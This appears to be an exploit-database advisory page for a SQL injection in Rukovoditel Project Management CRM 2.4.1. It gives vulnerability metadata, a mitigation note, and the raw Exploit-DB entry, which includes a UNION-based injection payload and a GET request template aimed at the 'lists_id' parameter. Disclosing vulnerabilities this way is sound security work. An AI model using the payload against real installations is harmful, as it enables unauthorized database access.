header-logo
Suggest Exploit
vendor:
Rukovoditel Project Management CRM
by:
Mehmet EMIROGLU
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Rukovoditel Project Management CRM
Affected Version From: 2.4.2001
Affected Version To: 2.4.2001
Patch Exists: NO
Related CWE:
CPE: a:rukovoditel_project_management_crm:rukovoditel:2.4.1
Metasploit:
Other Scripts:
Platforms Tested: Windows
2019

Rukovoditel Project Management CRM 2.4.1 – ‘lists_id’ SQL Injection

The SQL injection vulnerability exists in Rukovoditel Project Management CRM 2.4.1. It can be exploited by a logged-in user through the global list tab by creating a new list and applying SQL injection.

Mitigation:

The vendor should release a patch to fix the SQL injection vulnerability. In the meantime, users should avoid using the affected feature or implement input validation and parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

#################################################################

# Exploit Title: Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL
Injection
# Dork: N/A
# Date: 27-01-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Version: 2.4.1
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A
# Software Description : Rukovoditel is a free web-based open-source
project management
application. A far cry from traditional applications, Rukovoditel gives
users a broader and extensive approach to project management. Its
customization options allow users to create additional entities, modify
and specify the relationship between them, and generate the necessary
reports.

#################################################################

# Vulnerabilities
# For the SQL injection to be applied, the user must log in.
then from the Application structure screen to the global list tab.
add new value button to create a new list. You can apply sql injection
through the generated list.
The pictures of the weaknesses are below.
https://i.hizliresim.com/nQJZm5.jpg
https://i.hizliresim.com/WqGmEQ.jpg

#################################################################

# POC - SQLi
# Parameters : lists_id=1 (string)
# Attack Pattern : -1'+UnIOn+SeLEcT+1,2--+
# GET Request :
http://localhost/[PATH]/index.php?module=global_lists/choices&lists_id=1'[SQL]

#################################################################